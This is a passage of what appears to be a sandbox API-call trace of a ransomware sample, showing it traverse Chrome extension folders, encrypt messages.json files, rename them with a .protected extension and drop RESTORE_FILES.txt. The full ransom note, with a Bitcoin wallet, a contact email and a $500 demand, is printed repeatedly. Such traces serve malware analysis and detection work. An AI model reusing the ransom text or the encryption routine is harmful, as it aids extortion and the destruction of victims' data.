lpOverlapped=0x0) returned 1 [0079.909] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.909] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.909] CloseHandle (hObject=0x164) returned 1 [0079.910] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.910] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0079.910] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0079.910] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0079.910] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0079.910] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0079.910] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi") returned 143 [0079.910] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0079.910] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0079.910] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\*") returned 145 [0079.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.910] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.910] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.910] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.910] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.910] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.910] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\.") returned 145 [0079.910] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.910] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.911] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.911] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.911] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.911] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.911] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.911] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\..") returned 146 [0079.911] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.911] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.911] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.911] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.911] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.911] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.911] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.911] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.911] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json") returned 157 [0079.911] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.911] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.911] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.911] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json") returned 157 [0079.912] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json") returned 157 [0079.912] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json") returned 157 [0079.912] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.912] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.913] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.913] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.913] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.913] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.913] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.913] CloseHandle (hObject=0x168) returned 1 [0079.913] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.protected") returned 167 [0079.913] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.protected")) returned 1 [0079.914] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.914] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.914] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\RESTORE_FILES.txt") returned 161 [0079.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.914] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.914] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.915] lstrlenA (lpString="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") returned 684 [0079.915] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.915] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.915] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.915] CloseHandle (hObject=0x164) returned 1 [0079.915] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.915] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0079.915] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0079.915] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0079.915] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0079.915] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0079.915] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN") returned 146 [0079.915] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0079.915] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0079.915] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\*") returned 148 [0079.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0079.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.916] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.916] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.916] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.916] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\.") returned 148 [0079.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.916] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.916] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.916] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.916] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.916] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\..") returned 149 [0079.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.916] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.916] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.916] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.917] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.917] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.917] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.917] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.917] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json") returned 160 [0079.917] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.917] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json") returned 160 [0079.917] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json") returned 160 [0079.917] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json") returned 160 [0079.917] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.917] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.918] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.918] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.918] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.918] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.918] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.918] CloseHandle (hObject=0x168) returned 1 [0079.918] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.protected") returned 170 [0079.918] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0079.919] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.919] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.919] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 164 [0079.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0x164 [0079.919] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.919] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.920] lstrlenA (lpString="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") returned 684 [0079.920] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.920] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.920] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.920] CloseHandle (hObject=0x164) returned 1 [0079.921] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.921] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0079.921] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0079.921] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0079.921] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0079.921] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0079.921] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW") returned 146 [0079.921] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0079.921] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0079.921] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\*") returned 148 [0079.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\*", 
